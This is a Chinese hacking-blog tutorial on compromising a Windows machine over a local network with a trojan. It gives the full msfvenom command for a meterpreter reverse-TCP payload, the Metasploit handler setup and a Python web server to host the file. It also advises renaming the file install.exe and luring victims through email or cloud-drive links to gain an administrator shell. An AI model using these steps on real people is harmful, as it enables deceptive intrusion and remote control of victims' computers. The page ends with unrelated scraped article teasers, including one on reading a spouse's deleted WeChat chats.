基于局域网渗透攻击之木马攻击

访客3年前黑客文章975

使用kali生成木马文件,创建一个简易的web服务器,将木马文件伪装成install.exe类型的安装文件,诱使被攻击者点击木马文件,从而getshell。

准备环境

攻击机(kali):192.168.29.130

被攻击机(window server 2008 SP2):192.168.29.135

1、攻击机(kali)使用msfvenom 生成 payloadmsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.29.130 LPORT=4444 -f exe > /xx.exe2.kali攻击机打开msfconsoleuse exploit/multi/handler? //使用攻击模块set payload windows/meterpreter/reverse_tcp? //设置攻击载荷,建立反弹连接set LHOST 192.168.29.130 //设置源IP(攻击机IP)set LPORT 4444? //设置源端口(攻击机未被占用端口)show options ? //查看配置选项(选填,可查看未配置选项)3.实施攻击操作4.kali攻击机将木马文件拷贝到指定目录5.在该目录下面搭建一个简易的web服务器。命令:python -m SimpleHTTPServer 806.查看被攻击者的IP地址详情

7.被攻击者访问链接http://192.168.29.130/如下图,访问http://192.168.29.130/xx.exe即可直接下载木马文件(可以将URL放在邮件中发送给攻击者,或者放在网盘中添加指定内容诱使被攻击者点击,并且将exe文件名称修改为install.exe等类似安装文件进行伪装)8.被攻击者将木马文件下载到本地9.被攻击者双击木马文件后,攻击机kali得到一个会话,并且是更高administrator权限原文链接

相关文章

怎样才能查看老公微信聊天已删好记录

每个父母都希望自己的宝宝聪明可爱,孩子的智力是由遗传和后天的因素决定的,智商的遗传其实也是非常固定的。男孩的智商全部来自于妈妈,所以,妈妈的智商水平,决定了儿子关于智商的基因水平。孩子的智力还和什么有...

创造营2021首播 原际画林墨怿涵《慢慢》元气初舞

《创造营2021》于2月17日火爆开播,同样不同于往届的规则,今年采取了选手撑腰的新方式,林墨在94满票的情况下以90高票数进入A班,成为本期最具人气选手之一。 林墨怿涵作为第二组上台的组合,表...

31省区市新增确诊47例-新疆新增确诊病例23例

根据最新情况通报,10月28日,31省区市新增确诊47例,其中新疆新增确诊病例23例、境外输入病例24例,新疆新增确诊的23例本土病例均为此前的无症状感染者转确诊,且均为喀什地区疏附县报告,接下来大家...

淘宝客推广有效果吗(4个技巧教会你玩转淘宝客)

淘宝客推广有效果吗(4个技巧教会你玩转淘宝客)

淘客推广是一种按交易量收费的营销推广方式,淘客只需从淘客推广会员专区获得商品编码,一切顾客历经你的营销推广 (连接,个人网页,blog或小区发的贴子)进到淘宝商家店铺购买商品后,就可获得由商家付...

定向降准、专项再贷款 中小银行支持政策将升级

为进一步增强疫情期间对小微企业的融资帮扶力度,近期央行、银保监会等部门释放出中小银行支持政策将全面升级的信号。再贷款额度更多倾向地方法人银行、普惠金融定向降准进行年度动态调整、多渠道增强中小银行资本实...

龙武2怎么赚钱?龙武2怎么赚人民币

龙武2怎么赚钱?龙武2怎么赚人民币

笔者一直梦想着,万物复苏的季节里种下一把银票子,春去秋来收获大把银票子,无心载树,竟然结出元宝果实!没错,这些不可思议事情在《龙武2》里全然实现!今日小编为大家细说,《龙武2》那些另类的生财之道!...